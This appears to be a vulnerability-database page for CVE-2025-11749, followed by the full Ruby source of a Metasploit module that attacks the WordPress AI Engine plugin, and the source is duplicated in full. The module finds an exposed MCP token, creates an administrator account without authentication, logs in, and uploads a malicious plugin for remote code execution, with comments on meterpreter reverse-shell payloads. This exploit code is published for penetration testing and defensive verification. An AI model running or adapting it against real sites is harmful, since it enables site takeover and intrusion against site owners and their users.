9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin (versions <= 3.1.3). Usage: `use exploit/multi/http/wp_ai_engine_mcp_rce`, then `show targets` to list the available targets, `set TARGET <target-id>` to select one, ...
Basic Information
ID
MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-
Published
Dec 4, 2025 at 18:55
Affected Product
Affected Versions
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
# Matched against MCP error messages and raw response bodies; a hit is
# reported by send_mcp_tool_call as :user_exists.
ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
# Matched against MCP result text and raw response bodies; a hit is
# reported by send_mcp_tool_call as success (true).
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
# Declares the module metadata and registers its options.
#
# The metadata (name, description, authors, references, targets, notes) is
# merged into +info+ through update_info and handed to the parent
# constructor. USERNAME, PASSWORD and EMAIL are then registered as required
# options whose default values are generated with Faker.
#
# @param info [Hash] metadata passed through to update_info
def initialize(info = {})
  authors = [
    'Emiliano Versini', # Vulnerability discovery
    'Khaled Alenazi (Nxploited)', # PoC
    'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
    'dledda-r7' # Reviewer
  ]

  references = [
    ['CVE', '2025-11749'],
    ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
  ]

  # tested with php/meterpreter/reverse_tcp
  php_target = ['PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP }]
  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
  unix_target = ['Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD }]
  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
  windows_target = ['Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD }]

  notes = {
    'Stability' => [CRASH_SAFE],
    'Reliability' => [REPEATABLE_SESSION],
    'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
  }

  # The description text stays flush-left so the string is unchanged byte-for-byte.
  description = %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
}

  module_info = {
    'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
    'Description' => description,
    'Author' => authors,
    'License' => MSF_LICENSE,
    'References' => references,
    'Platform' => %w[php unix linux win],
    'Arch' => [ARCH_PHP, ARCH_CMD],
    'DisclosureDate' => '2025-11-04',
    'DefaultTarget' => 0,
    'Privileged' => false,
    'Targets' => [php_target, unix_target, windows_target],
    'Notes' => notes
  }

  super(update_info(info, module_info))

  username_opt = OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username])
  password_opt = OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)])
  email_opt = OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
  register_options([username_opt, password_opt, email_opt])
end
# Decides whether the target looks exploitable.
#
# Returns CheckCode::Unknown when wordpress_and_online? is false, passes
# through the readme version check result when it equals CheckCode::Safe,
# returns CheckCode::Safe when no MCP token can be found, and
# CheckCode::Appears otherwise. The discovered token is stored in @token.
def check
  return CheckCode::Unknown unless wordpress_and_online?

  version_verdict = check_plugin_version_from_readme('ai-engine', '3.1.4')
  return version_verdict if version_verdict == CheckCode::Safe

  @token = find_token
  if @token
    CheckCode::Appears
  else
    CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.')
  end
end
# Runs the module: finds the MCP token (reusing @token when already set),
# creates the administrator account through MCP, logs in with it and hands
# the session cookie to upload_and_execute_payload.
#
# Fails via fail_with when the target is not WordPress, no token is found,
# the account cannot be created, or the login does not yield a cookie. When
# the account already exists its password is updated before logging in.
def exploit
  unless wordpress_and_online?
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
  end

  @token ||= find_token
  unless @token
    fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.')
  end

  username, password, email = %w[USERNAME PASSWORD EMAIL].map { |key| datastore[key] }

  creation = create_admin_user(@token, username, password, email)
  fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if creation == false

  already_present = creation == :user_exists
  if already_present
    print_warning('User already exists, updating password and continuing exploitation...')
    update_user_password(@token, username, password)
  end

  session_cookie = wordpress_login(username, password)
  if session_cookie
    upload_and_execute_payload(session_cookie)
  else
    message = 'Failed to log in to WordPress admin.'
    message += ' User may exist with a different password.' if already_present
    fail_with(Failure::UnexpectedReply, message)
  end
end
# REST API helpers
# Sends a WordPress REST API request, first to `<base>/wp-json/<rest_path>`
# and, if that does not succeed, to `<base>/?rest_route=<rest_path>`.
#
# @param rest_path [String] REST route, e.g. '/' or '/mcp/v1/<token>/sse'
# @param method [String] HTTP verb; 'POST' requests are sent as application/json
# @param data [String, nil] request body
# @return the first response when its status is 2xx, otherwise whatever the
#   rest_route fallback request returns (possibly nil)
def send_rest_request(rest_path, method: 'GET', data: nil)
  request = {
    'method' => method,
    'ctype' => method == 'POST' ? 'application/json' : nil,
    'data' => data
  }

  pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
  res = send_request_cgi(request.merge('uri' => pretty_uri))
  # Any 2xx status (callers treat 204 as success) means this endpoint already
  # handled the request; re-sending it through rest_route would repeat a
  # state-changing POST.
  return res if res && (200..299).cover?(res.code)

  fallback = { 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'rest_route' => rest_path } }
  send_request_cgi(request.merge(fallback))
end
# Requests the REST API index ('/') and extracts the MCP token from the
# routes it lists. Returns nil when no token is found.
def find_token
  index_response = send_rest_request('/')
  extract_token_from_routes(index_response)
end
# Extracts the MCP token from a REST index response.
#
# Looks through the keys of the `routes` object for a route of the form
# `/mcp/v1/<token>/sse` and returns the first `<token>` that is not the
# literal 'sse'.
#
# @param res [#code, #get_json_document, nil] HTTP response
# @return [String, nil] the token, or nil when the response is missing, not
#   a 200, not a JSON object, or lists no matching route
def extract_token_from_routes(res)
  return nil unless res&.code == 200

  # The body may decode to something other than an object (e.g. an Array),
  # on which a string-key lookup would raise.
  document = res.get_json_document
  routes = document['routes'] if document.is_a?(Hash)
  return nil unless routes.is_a?(Hash)

  # \A/\z anchor the whole key; ^/$ would also match a single line inside it.
  mcp_route = %r{\A/mcp/v1/([^/]+)/sse\z}
  routes.each_key do |route|
    next unless route.is_a?(String)

    token = route[mcp_route, 1]
    return token if token && token != 'sse'
  end
  nil
end
# MCP API helpers
# Sends a request to `/mcp/v1/<token>/<segments joined by '/'>` through
# send_rest_request and returns its response.
#
# @param token [String] MCP token used as a path component
# @param segments [Array<String>] trailing path components
# @param method [String] HTTP verb
# @param data [String, nil] request body
def send_mcp_request(token, segments, method: 'GET', data: nil)
  tail = segments.join('/')
  route = format('/mcp/v1/%s/%s', token, tail)
  send_rest_request(route, method: method, data: data)
end
# Builds the JSON-RPC 2.0 `tools/call` request body for an MCP tool.
#
# @param tool_name [String] name of the tool to call
# @param arguments [Hash] arguments passed to the tool
# @return [String] JSON text with a random request id between 1 and 999999
def build_mcp_payload(tool_name, arguments)
  request_id = rand(1..999_999)
  call_params = { 'name' => tool_name, 'arguments' => arguments }
  envelope = {
    'jsonrpc' => '2.0',
    'id' => request_id,
    'method' => 'tools/call',
    'params' => call_params
  }
  envelope.to_json
end
# Calls an MCP tool and returns the `result.content` value of the reply
# without interpreting it.
#
# @param token [String] MCP token
# @param tool_name [String] tool to call
# @param arguments [Hash] tool arguments
# @return the value at result -> content, or nil when there is no response,
#   the status is not 200, or the JSON document is not an object
def send_mcp_tool_call_raw(token, tool_name, arguments)
  request_body = build_mcp_payload(tool_name, arguments)
  res = send_mcp_request(token, ['sse'], method: 'POST', data: request_body)
  return nil unless res && res.code == 200

  document = res.get_json_document
  document.is_a?(Hash) ? document.dig('result', 'content') : nil
end
# Calls an MCP tool and classifies the reply.
#
# @param token [String] MCP token
# @param tool_name [String] tool to call
# @param arguments [Hash] tool arguments
# @return [true] on HTTP 204, or when a non-error reply matches SUCCESS_PATTERN
# @return [:user_exists] when the reply reports that the account already exists
# @return [false] when there is no response, the status is neither 200 nor
#   204, the JSON document is not an object, the reply reports any other
#   error, or nothing recognisable is found
def send_mcp_tool_call(token, tool_name, arguments)
  payload = build_mcp_payload(tool_name, arguments)
  res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
  return false unless res
  return true if res.code == 204
  return false unless res.code == 200

  document = res.get_json_document
  return false unless document.is_a?(Hash)

  body = res.body.to_s
  error = document['error']
  result = document['result']
  # MCP reports tool-level failures inside the result via `isError`.
  tool_failed = result.is_a?(Hash) && result['isError'] == true

  # A reported error is never a success. Without this early exit an error
  # text such as "User could not be created" would satisfy the loose
  # SUCCESS_PATTERN checks below.
  if error || tool_failed
    return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
    return :user_exists if error.is_a?(Hash) && error['message'].to_s.match?(ERROR_PATTERN)
    return :user_exists if body.match?(ERROR_PATTERN)

    return false
  end

  # Only inspect content that has the expected shape (an Array of Hashes).
  content = result['content'] if result.is_a?(Hash)
  if content.is_a?(Array)
    return true if content.any? { |item| item.is_a?(Hash) && item['text'].to_s.match?(SUCCESS_PATTERN) }
  end

  # Last resort: scan the raw body.
  return :user_exists if body.match?(ERROR_PATTERN)
  return true if body.match?(SUCCESS_PATTERN)

  false
end
# User management
# Looks up the numeric ID of a WordPress user through the `wp_get_users`
# MCP tool.
#
# Each content item's `text` is parsed as JSON (a single object or an array
# of objects); the first object whose `user_login` equals +username+ and
# that has an `ID` supplies the result.
#
# @param token [String] MCP token
# @param username [String] login name to look for
# @return [Integer, nil] the user's ID, or nil when it cannot be determined
def get_user_id(token, username)
  query = {
    'search' => username,
    'search_columns' => ['user_login']
  }
  content = send_mcp_tool_call_raw(token, 'wp_get_users', query)
  return nil unless content.is_a?(Array)

  content.each do |item|
    next unless item.is_a?(Hash) && item['text']

    begin
      parsed = JSON.parse(item['text'].to_s)
    rescue JSON::ParserError
      next
    end

    candidates = parsed.is_a?(Array) ? parsed : [parsed]
    # Valid JSON can still be null, a scalar, or a list with non-object
    # entries; indexing those with a string key would raise.
    match = candidates.find { |user| user.is_a?(Hash) && user['user_login'] == username }
    return match['ID'].to_i if match && match['ID']
  end
  nil
end
# Asks the `wp_create_user` MCP tool to create an account with the
# 'administrator' role and returns send_mcp_tool_call's verdict.
#
# @param token [String] MCP token
# @param username [String] login for the new account
# @param password [String] password for the new account
# @param email [String] e-mail address for the new account
def create_admin_user(token, username, password, email)
  account = {
    'user_login' => username,
    'user_email' => email,
    'user_pass' => password
  }
  account['role'] = 'administrator'
  send_mcp_tool_call(token, 'wp_create_user', account)
end
# Sets a new password for an existing user via the `wp_update_user` MCP tool.
#
# @param token [String] MCP token
# @param username [String] login whose password is changed
# @param password [String] new password
# @return false when the user's ID cannot be found; otherwise the verdict of
#   send_mcp_tool_call (a warning is printed when that verdict is falsy)
def update_user_password(token, username, password)
  target_id = get_user_id(token, username)
  return false unless target_id

  changes = { 'ID' => target_id, 'fields' => { 'user_pass' => password } }
  send_mcp_tool_call(token, 'wp_update_user', changes).tap do |outcome|
    print_warning('Password update may have failed, attempting login anyway...') unless outcome
  end
end
# Payload execution
# Uploads a generated plugin with randomised plugin and payload names,
# registers its files and directory for cleanup, then requests the payload
# file under the plugins URL.
#
# Fails via fail_with when wordpress_upload_plugin reports failure.
#
# @param admin_cookie [String] session cookie passed to wordpress_upload_plugin
# @return the result of the final GET request
def upload_and_execute_payload(admin_cookie)
  plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
  payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
  payload_file = "#{payload_name}.php"

  archive = generate_plugin(plugin_name, payload_name)
  uploaded = wordpress_upload_plugin(plugin_name, archive.pack, admin_cookie)
  fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

  register_files_for_cleanup(payload_file, "#{plugin_name}.php")
  register_dir_for_cleanup("../#{plugin_name}")

  trigger_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
  send_request_cgi('uri' => trigger_uri, 'method' => 'GET')
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
# Matched against MCP error messages and raw response bodies; a hit is
# reported by send_mcp_tool_call as :user_exists.
ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
# Matched against MCP result text and raw response bodies; a hit is
# reported by send_mcp_tool_call as success (true).
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
# Declares the module metadata and registers its options.
#
# The metadata (name, description, authors, references, targets, notes) is
# merged into +info+ through update_info and handed to the parent
# constructor. USERNAME, PASSWORD and EMAIL are then registered as required
# options whose default values are generated with Faker.
#
# @param info [Hash] metadata passed through to update_info
def initialize(info = {})
  authors = [
    'Emiliano Versini', # Vulnerability discovery
    'Khaled Alenazi (Nxploited)', # PoC
    'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
    'dledda-r7' # Reviewer
  ]

  references = [
    ['CVE', '2025-11749'],
    ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
  ]

  # tested with php/meterpreter/reverse_tcp
  php_target = ['PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP }]
  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
  unix_target = ['Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD }]
  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
  windows_target = ['Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD }]

  notes = {
    'Stability' => [CRASH_SAFE],
    'Reliability' => [REPEATABLE_SESSION],
    'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
  }

  # The description text stays flush-left so the string is unchanged byte-for-byte.
  description = %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
}

  module_info = {
    'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
    'Description' => description,
    'Author' => authors,
    'License' => MSF_LICENSE,
    'References' => references,
    'Platform' => %w[php unix linux win],
    'Arch' => [ARCH_PHP, ARCH_CMD],
    'DisclosureDate' => '2025-11-04',
    'DefaultTarget' => 0,
    'Privileged' => false,
    'Targets' => [php_target, unix_target, windows_target],
    'Notes' => notes
  }

  super(update_info(info, module_info))

  username_opt = OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username])
  password_opt = OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)])
  email_opt = OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
  register_options([username_opt, password_opt, email_opt])
end
# Decides whether the target looks exploitable.
#
# Returns CheckCode::Unknown when wordpress_and_online? is false, passes
# through the readme version check result when it equals CheckCode::Safe,
# returns CheckCode::Safe when no MCP token can be found, and
# CheckCode::Appears otherwise. The discovered token is stored in @token.
def check
  return CheckCode::Unknown unless wordpress_and_online?

  version_verdict = check_plugin_version_from_readme('ai-engine', '3.1.4')
  return version_verdict if version_verdict == CheckCode::Safe

  @token = find_token
  if @token
    CheckCode::Appears
  else
    CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.')
  end
end
# Runs the module: finds the MCP token (reusing @token when already set),
# creates the administrator account through MCP, logs in with it and hands
# the session cookie to upload_and_execute_payload.
#
# Fails via fail_with when the target is not WordPress, no token is found,
# the account cannot be created, or the login does not yield a cookie. When
# the account already exists its password is updated before logging in.
def exploit
  unless wordpress_and_online?
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
  end

  @token ||= find_token
  unless @token
    fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.')
  end

  username, password, email = %w[USERNAME PASSWORD EMAIL].map { |key| datastore[key] }

  creation = create_admin_user(@token, username, password, email)
  fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if creation == false

  already_present = creation == :user_exists
  if already_present
    print_warning('User already exists, updating password and continuing exploitation...')
    update_user_password(@token, username, password)
  end

  session_cookie = wordpress_login(username, password)
  if session_cookie
    upload_and_execute_payload(session_cookie)
  else
    message = 'Failed to log in to WordPress admin.'
    message += ' User may exist with a different password.' if already_present
    fail_with(Failure::UnexpectedReply, message)
  end
end
# REST API helpers
# Sends a WordPress REST API request, first to `<base>/wp-json/<rest_path>`
# and, if that does not succeed, to `<base>/?rest_route=<rest_path>`.
#
# @param rest_path [String] REST route, e.g. '/' or '/mcp/v1/<token>/sse'
# @param method [String] HTTP verb; 'POST' requests are sent as application/json
# @param data [String, nil] request body
# @return the first response when its status is 2xx, otherwise whatever the
#   rest_route fallback request returns (possibly nil)
def send_rest_request(rest_path, method: 'GET', data: nil)
  request = {
    'method' => method,
    'ctype' => method == 'POST' ? 'application/json' : nil,
    'data' => data
  }

  pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
  res = send_request_cgi(request.merge('uri' => pretty_uri))
  # Any 2xx status (callers treat 204 as success) means this endpoint already
  # handled the request; re-sending it through rest_route would repeat a
  # state-changing POST.
  return res if res && (200..299).cover?(res.code)

  fallback = { 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'rest_route' => rest_path } }
  send_request_cgi(request.merge(fallback))
end
# Requests the REST API index ('/') and extracts the MCP token from the
# routes it lists. Returns nil when no token is found.
def find_token
  index_response = send_rest_request('/')
  extract_token_from_routes(index_response)
end
# Extracts the MCP token from a REST index response.
#
# Looks through the keys of the `routes` object for a route of the form
# `/mcp/v1/<token>/sse` and returns the first `<token>` that is not the
# literal 'sse'.
#
# @param res [#code, #get_json_document, nil] HTTP response
# @return [String, nil] the token, or nil when the response is missing, not
#   a 200, not a JSON object, or lists no matching route
def extract_token_from_routes(res)
  return nil unless res&.code == 200

  # The body may decode to something other than an object (e.g. an Array),
  # on which a string-key lookup would raise.
  document = res.get_json_document
  routes = document['routes'] if document.is_a?(Hash)
  return nil unless routes.is_a?(Hash)

  # \A/\z anchor the whole key; ^/$ would also match a single line inside it.
  mcp_route = %r{\A/mcp/v1/([^/]+)/sse\z}
  routes.each_key do |route|
    next unless route.is_a?(String)

    token = route[mcp_route, 1]
    return token if token && token != 'sse'
  end
  nil
end
# MCP API helpers
# Sends a request to `/mcp/v1/<token>/<segments joined by '/'>` through
# send_rest_request and returns its response.
#
# @param token [String] MCP token used as a path component
# @param segments [Array<String>] trailing path components
# @param method [String] HTTP verb
# @param data [String, nil] request body
def send_mcp_request(token, segments, method: 'GET', data: nil)
  tail = segments.join('/')
  route = format('/mcp/v1/%s/%s', token, tail)
  send_rest_request(route, method: method, data: data)
end
# Builds the JSON-RPC 2.0 `tools/call` request body for an MCP tool.
#
# @param tool_name [String] name of the tool to call
# @param arguments [Hash] arguments passed to the tool
# @return [String] JSON text with a random request id between 1 and 999999
def build_mcp_payload(tool_name, arguments)
  request_id = rand(1..999_999)
  call_params = { 'name' => tool_name, 'arguments' => arguments }
  envelope = {
    'jsonrpc' => '2.0',
    'id' => request_id,
    'method' => 'tools/call',
    'params' => call_params
  }
  envelope.to_json
end
# Calls an MCP tool and returns the `result.content` value of the reply
# without interpreting it.
#
# @param token [String] MCP token
# @param tool_name [String] tool to call
# @param arguments [Hash] tool arguments
# @return the value at result -> content, or nil when there is no response,
#   the status is not 200, or the JSON document is not an object
def send_mcp_tool_call_raw(token, tool_name, arguments)
  request_body = build_mcp_payload(tool_name, arguments)
  res = send_mcp_request(token, ['sse'], method: 'POST', data: request_body)
  return nil unless res && res.code == 200

  document = res.get_json_document
  document.is_a?(Hash) ? document.dig('result', 'content') : nil
end
# Calls an MCP tool and classifies the reply.
#
# @param token [String] MCP token
# @param tool_name [String] tool to call
# @param arguments [Hash] tool arguments
# @return [true] on HTTP 204, or when a non-error reply matches SUCCESS_PATTERN
# @return [:user_exists] when the reply reports that the account already exists
# @return [false] when there is no response, the status is neither 200 nor
#   204, the JSON document is not an object, the reply reports any other
#   error, or nothing recognisable is found
def send_mcp_tool_call(token, tool_name, arguments)
  payload = build_mcp_payload(tool_name, arguments)
  res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
  return false unless res
  return true if res.code == 204
  return false unless res.code == 200

  document = res.get_json_document
  return false unless document.is_a?(Hash)

  body = res.body.to_s
  error = document['error']
  result = document['result']
  # MCP reports tool-level failures inside the result via `isError`.
  tool_failed = result.is_a?(Hash) && result['isError'] == true

  # A reported error is never a success. Without this early exit an error
  # text such as "User could not be created" would satisfy the loose
  # SUCCESS_PATTERN checks below.
  if error || tool_failed
    return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
    return :user_exists if error.is_a?(Hash) && error['message'].to_s.match?(ERROR_PATTERN)
    return :user_exists if body.match?(ERROR_PATTERN)

    return false
  end

  # Only inspect content that has the expected shape (an Array of Hashes).
  content = result['content'] if result.is_a?(Hash)
  if content.is_a?(Array)
    return true if content.any? { |item| item.is_a?(Hash) && item['text'].to_s.match?(SUCCESS_PATTERN) }
  end

  # Last resort: scan the raw body.
  return :user_exists if body.match?(ERROR_PATTERN)
  return true if body.match?(SUCCESS_PATTERN)

  false
end
# User management
# Looks up the numeric ID of a WordPress user through the `wp_get_users`
# MCP tool.
#
# Each content item's `text` is parsed as JSON (a single object or an array
# of objects); the first object whose `user_login` equals +username+ and
# that has an `ID` supplies the result.
#
# @param token [String] MCP token
# @param username [String] login name to look for
# @return [Integer, nil] the user's ID, or nil when it cannot be determined
def get_user_id(token, username)
  query = {
    'search' => username,
    'search_columns' => ['user_login']
  }
  content = send_mcp_tool_call_raw(token, 'wp_get_users', query)
  return nil unless content.is_a?(Array)

  content.each do |item|
    next unless item.is_a?(Hash) && item['text']

    begin
      parsed = JSON.parse(item['text'].to_s)
    rescue JSON::ParserError
      next
    end

    candidates = parsed.is_a?(Array) ? parsed : [parsed]
    # Valid JSON can still be null, a scalar, or a list with non-object
    # entries; indexing those with a string key would raise.
    match = candidates.find { |user| user.is_a?(Hash) && user['user_login'] == username }
    return match['ID'].to_i if match && match['ID']
  end
  nil
end
# Asks the `wp_create_user` MCP tool to create an account with the
# 'administrator' role and returns send_mcp_tool_call's verdict.
#
# @param token [String] MCP token
# @param username [String] login for the new account
# @param password [String] password for the new account
# @param email [String] e-mail address for the new account
def create_admin_user(token, username, password, email)
  account = {
    'user_login' => username,
    'user_email' => email,
    'user_pass' => password
  }
  account['role'] = 'administrator'
  send_mcp_tool_call(token, 'wp_create_user', account)
end
# Sets a new password for an existing user via the `wp_update_user` MCP tool.
#
# @param token [String] MCP token
# @param username [String] login whose password is changed
# @param password [String] new password
# @return false when the user's ID cannot be found; otherwise the verdict of
#   send_mcp_tool_call (a warning is printed when that verdict is falsy)
def update_user_password(token, username, password)
  target_id = get_user_id(token, username)
  return false unless target_id

  changes = { 'ID' => target_id, 'fields' => { 'user_pass' => password } }
  send_mcp_tool_call(token, 'wp_update_user', changes).tap do |outcome|
    print_warning('Password update may have failed, attempting login anyway...') unless outcome
  end
end
# Payload execution
# Uploads a generated plugin with randomised plugin and payload names,
# registers its files and directory for cleanup, then requests the payload
# file under the plugins URL.
#
# Fails via fail_with when wordpress_upload_plugin reports failure.
#
# @param admin_cookie [String] session cookie passed to wordpress_upload_plugin
# @return the result of the final GET request
def upload_and_execute_payload(admin_cookie)
  plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
  payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
  payload_file = "#{payload_name}.php"

  archive = generate_plugin(plugin_name, payload_name)
  uploaded = wordpress_upload_plugin(plugin_name, archive.pack, admin_cookie)
  fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

  register_files_for_cleanup(payload_file, "#{plugin_name}.php")
  register_dir_for_cleanup("../#{plugin_name}")

  trigger_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
  send_request_cgi('uri' => trigger_uri, 'method' => 'GET')
end
end